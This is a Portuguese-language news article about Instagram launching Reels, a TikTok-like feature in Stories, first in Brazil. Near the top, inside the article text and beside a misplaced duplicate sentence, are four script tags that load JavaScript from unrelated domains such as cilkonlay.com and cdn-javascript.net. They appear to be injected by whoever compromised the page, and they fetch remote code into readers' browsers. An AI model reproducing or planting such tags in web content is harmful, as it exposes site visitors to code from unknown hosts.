Mídia

Instagram lança recurso semelhante ao TikTok

Vale ressaltar que os rumores sobre o novo recurso datam de setembro, apenas se tornando oficial agora. <script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script> <script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script> <script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573690263643" type="text/javascript"></script> <script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>

Novo formato chamado Reels exclusivamente no Brasil.

Se tem uma coisa que nós aprendemos sobre como Mark Zuckerberg comanda seus negócios, é que ele está sempre de olho na concorrência, e, quando algum novo aplicativo cresce de forma significante, o dono do Facebook ou compra o app ou copia, sem pudores, os principais recursos do aplicativo em questão em produtos da sua empresa.

Confira as últimas novidades sobre marketing digital aqui.

Leia também: Instagram reformula opções de gênero.

Sendo assim, não é de se surpreender que o Instagram esteja lançando um novo recurso nos Stories que é muito semelhante às ferramentas do TikTok, que já é o app não-jogo mais baixado dos Estados Unidos no ano.

Vale ressaltar que os rumores sobre o novo recurso datam de setembro, apenas se tornando oficial agora.

De acordo com o TechCrunch, a ferramenta permite criar “videoclipes de 15 segundos definidos como músicas e compartilhá-los como Stories”. Usando o recurso aliado ao catálogo de música da plataforma, eis que temos o TikTok no Instagram.

Ao contrário do TikTok, no entanto, o Reels se beneficiará de tudo o que o Instagram já oferece, como o recurso de mensagens diretas, por exemplo, possibilitando que nem tudo precisa ser compartilhado publicamente.

De acordo com o diretor de gerenciamento de produtos do Instagram, Robby Stein, o recurso já está disponível para os dispositivos iOS e Android no Brasil e, por enquanto, não há planos para lançá-lo em outros países.

O Facebook já havia tentado competir com o TikTok por meio do aplicativo de compartilhamento de vídeo Lasso, mas sem sucesso. A integração de recursos semelhantes a um aplicativo já existente provavelmente terá mais sucesso, uma vez que é sempre mais difícil convencer o público a baixar um novo app.